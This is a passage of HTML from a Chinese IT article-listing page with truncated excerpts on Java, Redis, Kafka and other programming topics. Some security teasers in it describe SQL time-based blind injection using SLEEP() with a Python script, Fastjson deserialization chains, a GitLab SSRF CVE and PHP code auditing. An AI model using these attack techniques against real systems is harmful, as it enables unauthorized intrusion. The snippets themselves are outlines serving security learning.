<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一</div>
                    </li>
                    <li><a href="/article/1888962536741597184.htm"
                           title="利用二分法进行 SQL 时间盲注" target="_blank">利用二分法进行 SQL 时间盲注</a>
                        <span class="text-muted">智商不在服务器</span>
<a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB/1.htm">渗透攻击</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a>
                        <div>什么是时间盲注？SQL盲注（BlindSQLInjection）是一种常见的Web安全漏洞，其中时间盲注是基于查询延迟的SQL注入方式。当服务器不返回可见的错误信息时，我们可以利用SLEEP()函数来判断查询结果是否符合预期。代码解析本代码通过二分法+时间盲注逐字符提取数据库中的信息。它通过SLEEP()让服务器延迟响应，从而判断SQL条件是否成立。importrequestsimportconc</div>
                    </li>
                    <li><a href="/article/1888850445972074496.htm"
                           title="信安教程第二版-第22章网站安全需求分析与安全保护工程" target="_blank">信安教程第二版-第22章网站安全需求分析与安全保护工程</a>
                        <span class="text-muted">鹿鸣天涯</span>

                        <div>第22章网站安全需求分析与安全保护工程22.1网站安全威胁与需求分析47322.1.1网站安全概念47322.1.2网站安全分析47422.1.3网站安全需求47522.2ApacheWeb安全分析与增强47622.2.1ApacheWeb概述47622.2.2ApacheWeb安全分析47622.2.3ApacheWeb安全机制47722.2.4ApacheWeb安全增强48022.3IIS安全</div>
                    </li>
                    <li><a href="/article/1888842499380801536.htm"
                           title="22.2、Apache安全分析与增强" target="_blank">22.2、Apache安全分析与增强</a>
                        <span class="text-muted">山兔1</span>
<a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E5%B7%A5%E7%A8%8B%E5%B8%88/1.htm">信息安全工程师</a><a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>目录ApacheWeb安全分析与增强-ApacheWeb概述ApacheWeb安全分析与增强-ApacheWeb安全威胁ApacheWeb安全机制ApacheWeb安全增强ApacheWeb安全分析与增强-ApacheWeb概述阿帕奇是一个用于搭建WEB服务器的应用程序，它是开源的，它的配置文件主要有四个，httpd.conf，这个文件是最核心最主要的，它是我们的主配置文件，里面存的是网站的一些属</div>
                    </li>
                    <li><a href="/article/1888331115756843008.htm"
                           title="web安全渗透测试十大常规项（一）：web渗透测试之Fastjson反序列化" target="_blank">web安全渗透测试十大常规项（一）：web渗透测试之Fastjson反序列化</a>
                        <span class="text-muted">HACKNOE</span>
<a class="tag" taget="_blank" href="/search/Web%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80%E5%AE%9E%E9%AA%8C%E5%AE%A4/1.htm">Web渗透测试基础实验室</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>渗透测试之Java反序列化1.Fastjson反序列化1.1FastJson反序列化链知识点1.2FastJson反序列化链分析1.3.1FastJson1.2.24利用链分析1.3.2FastJson1.2.25-1.2.47CC链分析1.3.2.1、开启autoTypeSupport：1.2.25-1.2.411.3.2.2fastjson-1.2.42版本绕过1.3.2.3fastjson-</div>
                    </li>
                    <li><a href="/article/1887818012497604608.htm"
                           title="破解加密" target="_blank">破解加密</a>
                        <span class="text-muted">猪猪_女孩</span>
<a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/ajax/1.htm">ajax</a><a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a><a class="tag" taget="_blank" href="/search/css/1.htm">css</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a>
                        <div>一.CSS加密CSS加密：比较简单CSS—>层叠样式表，操作样式CSS都是对字体进行加密处理的，在网页源代码中显示[&#x+16进制数;]分析：找到css加密文件即可@font-face是CSS中的一个模块，作用：可以将自定义的字体嵌入到网页中，让网页的字体不仅仅限定在WEB安全字体从css文件中找到包含字体的woff文件有时候会出现多个woff，多个里面肯定会有一个或者几个woff文件是对网页的</div>
                    </li>
                    <li><a href="/article/1887756362302156800.htm"
                           title="追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)" target="_blank">追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)</a>
                        <span class="text-muted">Ms08067安全实验室</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/git/1.htm">git</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/gitlab/1.htm">gitlab</a><a class="tag" taget="_blank" href="/search/docker/1.htm">docker</a>
                        <div>文章来源｜MS08067Web安全知识星球本文作者：Taoing（Web安全攻防合伙人）GitLab是一个用于仓库管理系统的开源项目，使用Git作为代码管理工具，并在此基础上搭建起来的Web服务。一、漏洞描述GitLab是美国GitLab公司的一款使用RubyonRails开发的、自托管的、Git（版本控制系统）项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。CVE-20</div>
                    </li>
                    <li><a href="/article/1886871191336054784.htm"
                           title="PHP代码审计" target="_blank">PHP代码审计</a>
                        <span class="text-muted">Smile灬凉城666</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>目的：对源代码进行审计，寻找代码中的BUG和安全漏洞一.代码审计的基础1.基础:html/js基础语法、PHP基础语法，面向对象思想，PHP小项目开发(Blog、注册登录、表单、文件上传、留言板等)，Web漏洞挖掘及利用，Web安全工具基本使用(burpsuite、sqlmap等)，代码审计工具(seay审计系统、zendstudio+xdebug等)2.代码审计两种基本方式：通读全文源码：通读全</div>
                    </li>
                                <li><a href="/article/51.htm"
                                       title="mondb入手" target="_blank">mondb入手</a>
                                    <span class="text-muted">木zi_鸣</span>
<a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a>
                                    <div>windows 启动mongodb  编写bat文件， 
 
mongod --dbpath D:\software\MongoDBDATA 
mongod --help  查询各种配置 
配置在mongob 
 
打开批处理，即可启动，27017原生端口，shell操作监控端口  扩展28017，web端操作端口 
 
启动配置文件配置， 
 
数据更灵活 </div>
                                </li>
                                <li><a href="/article/178.htm"
                                       title="大型高并发高负载网站的系统架构" target="_blank">大型高并发高负载网站的系统架构</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/%E9%AB%98%E5%B9%B6%E5%8F%91/1.htm">高并发</a><a class="tag" taget="_blank" href="/search/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1/1.htm">负载均衡</a>
                                    <div>        扩展Web应用程序 
一.概念 
        简单的来说，如果一个系统可扩展，那么你可以通过扩展来提供系统的性能。这代表着系统能够容纳更高的负载、更大的数据集，并且系统是可维护的。扩展和语言、某项具体的技术都是无关的。扩展可以分为两种： 
        1.</div>
                                </li>
                                <li><a href="/article/305.htm"
                                       title="DISPLAY变量和xhost(原创)" target="_blank">DISPLAY变量和xhost(原创)</a>
                                    <span class="text-muted">czmmiao</span>
<a class="tag" taget="_blank" href="/search/display/1.htm">display</a>
                                    <div>DISPLAY 
在Linux/Unix类操作系统上, DISPLAY用来设置将图形显示到何处. 直接登陆图形界面或者登陆命令行界面后使用startx启动图形, DISPLAY环境变量将自动设置为:0:0, 此时可以打开终端, 输出图形程序的名称(比如xclock)来启动程序, 图形将显示在本地窗口上, 在终端上输入printenv查看当前环境变量, 输出结果中有如下内容:DISPLAY=:0.0</div>
                                </li>
                                <li><a href="/article/432.htm"
                                       title="获取B/S客户端IP" target="_blank">获取B/S客户端IP</a>
                                    <span class="text-muted">周凡杨</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B/1.htm">编程</a><a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">浏览器</a>
                                    <div>   最近想写个B/S架构的聊天系统，因为以前做过C/S架构的QQ聊天系统，所以对于Socket通信编程只是一个巩固。对于C/S架构的聊天系统，由于存在客户端Java应用，所以直接在代码中获取客户端的IP，应用的方法为： 
   String ip = InetAddress.getLocalHost().getHostAddress(); 
然而对于WEB</div>
                                </li>
                                <li><a href="/article/559.htm"
                                       title="浅谈类和对象" target="_blank">浅谈类和对象</a>
                                    <span class="text-muted">朱辉辉33</span>
<a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B/1.htm">编程</a>
                                    <div>    类是对一类事物的总称，对象是描述一个物体的特征，类是对象的抽象。简单来说，类是抽象的，不占用内存，对象是具体的， 
占用存储空间。 
    类是由属性和方法构成的，基本格式是public  class 类名{ 
 
 //定义属性 
 private/public 数据类型 属性名； 
 
 //定义方法 
 publ</div>
                                </li>
                                <li><a href="/article/686.htm"
                                       title="android activity与viewpager+fragment的生命周期问题" target="_blank">android activity与viewpager+fragment的生命周期问题</a>
                                    <span class="text-muted">肆无忌惮_</span>
<a class="tag" taget="_blank" href="/search/viewpager/1.htm">viewpager</a>
                                    <div>有一个Activity里面是ViewPager，ViewPager里面放了两个Fragment。 
第一次进入这个Activity。开启了服务，并在onResume方法中绑定服务后，对Service进行了一定的初始化，其中调用了Fragment中的一个属性。 
		super.onResume();
		bindService(intent, conn, BIND_AUTO_CREATE);
</div>
                                </li>
                                <li><a href="/article/813.htm"
                                       title="base64Encode对图片进行编码" target="_blank">base64Encode对图片进行编码</a>
                                    <span class="text-muted">843977358</span>
<a class="tag" taget="_blank" href="/search/base64/1.htm">base64</a><a class="tag" taget="_blank" href="/search/%E5%9B%BE%E7%89%87/1.htm">图片</a><a class="tag" taget="_blank" href="/search/encoder/1.htm">encoder</a>
                                    <div>/**
	 * 对图片进行base64encoder编码
	 * 
	 * @author mrZhang
	 * @param path
	 * @return
	 */
	public static String encodeImage(String path) {
		BASE64Encoder encoder = null;
		byte[] b = null;
		I</div>
                                </li>
                                <li><a href="/article/940.htm"
                                       title="Request Header简介" target="_blank">Request Header简介</a>
                                    <span class="text-muted">aigo</span>
<a class="tag" taget="_blank" href="/search/servlet/1.htm">servlet</a>
                                    <div>当一个客户端(通常是浏览器)向Web服务器发送一个请求是，它要发送一个请求的命令行，一般是GET或POST命令，当发送POST命令时，它还必须向服务器发送一个叫“Content-Length”的请求头(Request   Header)   用以指明请求数据的长度，除了Content-Length之外，它还可以向服务器发送其它一些Headers，如：    </div>
                                </li>
                                <li><a href="/article/1067.htm"
                                       title="HttpClient4.3 创建SSL协议的HttpClient对象" target="_blank">HttpClient4.3 创建SSL协议的HttpClient对象</a>
                                    <span class="text-muted">alleni123</span>
<a class="tag" taget="_blank" href="/search/httpclient/1.htm">httpclient</a><a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a><a class="tag" taget="_blank" href="/search/ssl/1.htm">ssl</a>
                                    <div>public class HttpClientUtils
{
	public static CloseableHttpClient createSSLClientDefault(CookieStore cookies){
		SSLContext sslContext=null;
		
		try
		{
			sslContext=new SSLContextBuilder().l</div>
                                </li>
                                <li><a href="/article/1194.htm"
                                       title="java取反 -右移-左移-无符号右移的探讨" target="_blank">java取反 -右移-左移-无符号右移的探讨</a>
                                    <span class="text-muted">百合不是茶</span>
<a class="tag" taget="_blank" href="/search/%E4%BD%8D%E8%BF%90%E7%AE%97%E7%AC%A6+%E4%BD%8D%E7%A7%BB/1.htm">位运算符 位移</a>
                                    <div>取反：
		在二进制中第一位，1表示符数，0表示正数
		byte a = -1;
		原码：10000001
		反码：11111110
		补码：11111111
      //异或: 00000000
		byte b = -2;
		原码：10000010
		反码：11111101
		补码：11111110
      //异或: 00000001
		
	</div>
                                </li>
                                <li><a href="/article/1321.htm"
                                       title="java多线程join的作用与用法" target="_blank">java多线程join的作用与用法</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%A4%9A%E7%BA%BF%E7%A8%8B/1.htm">多线程</a>
                                    <div>        对于JAVA的join，JDK 是这样说的：join public final void join （long millis ）throws InterruptedException Waits at most millis milliseconds for this thread to die. A timeout of 0 means t</div>
                                </li>
                                <li><a href="/article/1448.htm"
                                       title="Java发送http请求(get 与post方法请求)" target="_blank">Java发送http请求(get 与post方法请求)</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a>
                                    <div>PostRequest.java 
package com.bijian.study;

import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.HttpURL</div>
                                </li>
                                <li><a href="/article/1575.htm"
                                       title="【Struts2二】struts.xml中package下的action配置项默认值" target="_blank">【Struts2二】struts.xml中package下的action配置项默认值</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/struts.xml/1.htm">struts.xml</a>
                                    <div>在第一部份，定义了struts.xml文件，如下所示： 
  
<!DOCTYPE struts PUBLIC
        "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
        "http://struts.apache.org/dtds/struts</div>
                                </li>
                                <li><a href="/article/1702.htm"
                                       title="【Kafka十三】Kafka Simple Consumer" target="_blank">【Kafka十三】Kafka Simple Consumer</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/simple/1.htm">simple</a>
                                    <div>代码中关于Host和Port是割裂开的，这会导致单机环境下的伪分布式Kafka集群环境下，这个例子没法运行。 
实际情况是需要将host和port绑定到一起， 
  
package kafka.examples.lowlevel;

import kafka.api.FetchRequest;
import kafka.api.FetchRequestBuilder;
impo</div>
                                </li>
                                <li><a href="/article/1829.htm"
                                       title="nodejs学习api" target="_blank">nodejs学习api</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/nodejs+api/1.htm">nodejs api</a>
                                    <div>NodeJS基础 什么是NodeJS 
JS是脚本语言，脚本语言都需要一个解析器才能运行。对于写在HTML页面里的JS，浏览器充当了解析器的角色。而对于需要独立运行的JS，NodeJS就是一个解析器。 
每一种解析器都是一个运行环境，不但允许JS定义各种数据结构，进行各种计算，还允许JS使用运行环境提供的内置对象和方法做一些事情。例如运行在浏览器中的JS的用途是操作DOM，浏览器就提供了docum</div>
                                </li>
                                <li><a href="/article/1956.htm"
                                       title="java-64.寻找第N个丑数" target="_blank">java-64.寻找第N个丑数</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>


public class UglyNumber {

	/**
	 * 64.查找第N个丑数
具体思路可参考 [url] http://zhedahht.blog.163.com/blog/static/2541117420094245366965/[/url]
	 * 
题目：我们把只包含因子
2、3和5的数称作丑数（Ugly Number）。例如6、8都是丑数，但14</div>
                                </li>
                                <li><a href="/article/2083.htm"
                                       title="二维数组（矩阵）对角线输出" target="_blank">二维数组（矩阵）对角线输出</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%8C%E7%BB%B4%E6%95%B0%E7%BB%84/1.htm">二维数组</a>
                                    <div>

/**
二维数组 对角线输出 两个方向
例如对于数组：
{ 1, 2, 3, 4 }, 
{ 5, 6, 7, 8 },
{ 9, 10, 11, 12 }, 
{ 13, 14, 15, 16 },

slash方向输出：
1 
5 2 
9 6 3 
13 10 7 4 
14 11 8 
15 12 
16 

backslash输出：
4 
3</div>
                                </li>
                                <li><a href="/article/2210.htm"
                                       title="[JWFD开源工作流设计]工作流跳跃模式开发关键点(今日更新)" target="_blank">[JWFD开源工作流设计]工作流跳跃模式开发关键点(今日更新)</a>
                                    <span class="text-muted">comsci</span>
<a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C%E6%B5%81/1.htm">工作流</a>
                                    <div>   既然是做开源软件的,我们的宗旨就是给大家分享设计和代码,那么现在我就用很简单扼要的语言来透露这个跳跃模式的设计原理 
 
   大家如果用过JWFD的ARC-自动运行控制器,或者看过代码,应该知道在ARC算法模块中有一个函数叫做SAN(),这个函数就是ARC的核心控制器,要实现跳跃模式,在SAN函数中一定要对LN链表数据结构进行操作,首先写一段代码,把</div>
                                </li>
                                <li><a href="/article/2337.htm"
                                       title="redis常见使用" target="_blank">redis常见使用</a>
                                    <span class="text-muted">cuityang</span>
<a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a><a class="tag" taget="_blank" href="/search/%E5%B8%B8%E8%A7%81%E4%BD%BF%E7%94%A8/1.htm">常见使用</a>
                                    <div>redis 通常被认为是一个数据结构服务器，主要是因为其有着丰富的数据结构 strings、map、 list、sets、 sorted sets 
 
引入jar包 jedis-2.1.0.jar  (本文下方提供下载) 
 
package redistest; 
 
import redis.clients.jedis.Jedis; 
 
public class Listtest</div>
                                </li>
                                <li><a href="/article/2464.htm"
                                       title="配置多个redis" target="_blank">配置多个redis</a>
                                    <span class="text-muted">dalan_123</span>
<a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a>
                                    <div>配置多个redis客户端 
<?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"       xmlns:xsi=&quo</div>
                                </li>
                                <li><a href="/article/2591.htm"
                                       title="attrib命令" target="_blank">attrib命令</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/attr/1.htm">attr</a>
                                    <div>     
attrib指令用于修改文件的属性.文件的常见属性有:只读.存档.隐藏和系统.      
  只读属性是指文件只可以做读的操作.不能对文件进行写的操作.就是文件的写保护.  
 
  存档属性是用来标记文件改动的.即在上一次备份后文件有所改动.一些备份软件在备份的时候会只去备份带有存档属性的文件.  
 </div>
                                </li>
                                <li><a href="/article/2718.htm"
                                       title="Yii使用公共函数" target="_blank">Yii使用公共函数</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/yii/1.htm">yii</a>
                                    <div>在网站项目中，没必要把公用的函数写成一个工具类，有时候面向过程其实更方便。   在入口文件index.php里添加   require_once('protected/function.php');   即可对其引用，成为公用的函数集合。   function.php如下：   
   <?php   /**     * This is the shortcut to D</div>
                                </li>
                                <li><a href="/article/2845.htm"
                                       title="linux 系统资源的查看（free、uname、uptime、netstat）" target="_blank">linux 系统资源的查看（free、uname、uptime、netstat）</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/netstat/1.htm">netstat</a><a class="tag" taget="_blank" href="/search/linux+uname/1.htm">linux uname</a><a class="tag" taget="_blank" href="/search/linux+uptime/1.htm">linux uptime</a><a class="tag" taget="_blank" href="/search/linux+free/1.htm">linux free</a>
                                    <div>linux 系统资源的查看 
转载请出自出处：http://eksliang.iteye.com/blog/2167081 
  
http://eksliang.iteye.com 一、free查看内存的使用情况 
语法如下： 
  
free [-b][-k][-m][-g] [-t]
参数含义
-b:直接输入free时，显示的单位是kb我们可以使用b(bytes),m</div>
                                </li>
                                <li><a href="/article/2972.htm"
                                       title="JAVA的位操作符" target="_blank">JAVA的位操作符</a>
                                    <span class="text-muted">greemranqq</span>
<a class="tag" taget="_blank" href="/search/%E4%BD%8D%E8%BF%90%E7%AE%97/1.htm">位运算</a><a class="tag" taget="_blank" href="/search/JAVA%E4%BD%8D%E7%A7%BB/1.htm">JAVA位移</a><a class="tag" taget="_blank" href="/search/%3C%3C/1.htm"><<</a><a class="tag" taget="_blank" href="/search/%3E%3E%3E/1.htm">>>></a>
                                    <div>最近几种进制，加上各种位操作符，发现都比较模糊，不能完全掌握，这里就再熟悉熟悉。 
  
1.按位操作符 ： 
   按位操作符是用来操作基本数据类型中的单个bit,即二进制位，会对两个参数执行布尔代数运算，获得结果。 
   与（&）运算： 
   1&1 = 1, 1&0 = 0, 0&0 &</div>
                                </li>
                                <li><a href="/article/3099.htm"
                                       title="Web前段学习网站" target="_blank">Web前段学习网站</a>
                                    <span class="text-muted">ihuning</span>
<a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a>
                                    <div>  
Web前段学习网站 
菜鸟学习：http://www.w3cschool.cc/ 
  
JQuery中文网：http://www.jquerycn.cn/ 
  
内存溢出：http://outofmemory.cn/#csdn.blog 
  
http://www.icoolxue.com/ 
  
http://www.jikexue</div>
                                </li>
                                <li><a href="/article/3226.htm"
                                       title="强强联合：FluxBB 作者加盟 Flarum" target="_blank">强强联合：FluxBB 作者加盟 Flarum</a>
                                    <span class="text-muted">justjavac</span>
<a class="tag" taget="_blank" href="/search/r/1.htm">r</a>
                                    <div>原文：FluxBB Joins Forces With Flarum作者：Toby Zerner译文：强强联合：FluxBB 作者加盟 Flarum译者：justjavac  
FluxBB 是一个快速、轻量级论坛软件，它的开发者是一名德国的 PHP 天才 Franz Liedke。FluxBB 的下一个版本(2.0)将被完全重写，并已经开发了一段时间。FluxBB 看起来非常有前途的，</div>
                                </li>
                                <li><a href="/article/3353.htm"
                                       title="java统计在线人数（session存储信息的）" target="_blank">java统计在线人数（session存储信息的）</a>
                                    <span class="text-muted">macroli</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a>
                                    <div>这篇日志是我写的第三次了 前两次都发布失败！郁闷极了！ 
  
由于在web开发中常常用到这一部分所以在此记录一下，呵呵，就到备忘录了！ 
我对于登录信息时使用session存储的，所以我这里是通过实现HttpSessionAttributeListener这个接口完成的。 
1、实现接口类，在web.xml文件中配置监听类，从而可以使该类完成其工作。 
public class Ses</div>
                                </li>
                                <li><a href="/article/3480.htm"
                                       title="bootstrp carousel初体验 快速构建图片播放" target="_blank">bootstrp carousel初体验 快速构建图片播放</a>
                                    <span class="text-muted">qiaolevip</span>
<a class="tag" taget="_blank" href="/search/%E6%AF%8F%E5%A4%A9%E8%BF%9B%E6%AD%A5%E4%B8%80%E7%82%B9%E7%82%B9/1.htm">每天进步一点点</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E6%B0%B8%E6%97%A0%E6%AD%A2%E5%A2%83/1.htm">学习永无止境</a><a class="tag" taget="_blank" href="/search/bootstrap/1.htm">bootstrap</a><a class="tag" taget="_blank" href="/search/%E7%BA%B5%E8%A7%82%E5%8D%83%E8%B1%A1/1.htm">纵观千象</a>
                                    <div>img{
			border: 1px solid white;
			box-shadow: 2px 2px 12px #333;
			_width: expression(this.width > 600 ? "600px" : this.width + "px");
			_height: expression(this.width &</div>
                                </li>
                                <li><a href="/article/3607.htm"
                                       title="SparkSQL读取HBase数据，通过自定义外部数据源" target="_blank">SparkSQL读取HBase数据，通过自定义外部数据源</a>
                                    <span class="text-muted">superlxw1234</span>
<a class="tag" taget="_blank" href="/search/spark/1.htm">spark</a><a class="tag" taget="_blank" href="/search/sparksql/1.htm">sparksql</a><a class="tag" taget="_blank" href="/search/sparksql%E8%AF%BB%E5%8F%96hbase/1.htm">sparksql读取hbase</a><a class="tag" taget="_blank" href="/search/sparksql%E5%A4%96%E9%83%A8%E6%95%B0%E6%8D%AE%E6%BA%90/1.htm">sparksql外部数据源</a>
                                    <div>关键字：SparkSQL读取HBase、SparkSQL自定义外部数据源 
  
  
前面文章介绍了SparSQL通过Hive操作HBase表。 
  
SparkSQL从1.2开始支持自定义外部数据源(External DataSource)，这样就可以通过API接口来实现自己的外部数据源。这里基于Spark1.4.0，简单介绍SparkSQL自定义外部数据源，访</div>
                                </li>
                                <li><a href="/article/3734.htm"
                                       title="Spring Boot 1.3.0.M1发布" target="_blank">Spring Boot 1.3.0.M1发布</a>
                                    <span class="text-muted">wiselyman</span>
<a class="tag" taget="_blank" href="/search/spring+boot/1.htm">spring boot</a>
                                    <div>    Spring Boot 1.3.0.M1于6.12日发布，现在可以从Spring milestone repository下载。这个版本是基于Spring Framework 4.2.0.RC1,并在Spring Boot 1.2之上提供了大量的新特性improvements and new features。主要包含以下： 
  
1.提供一个新的sprin</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>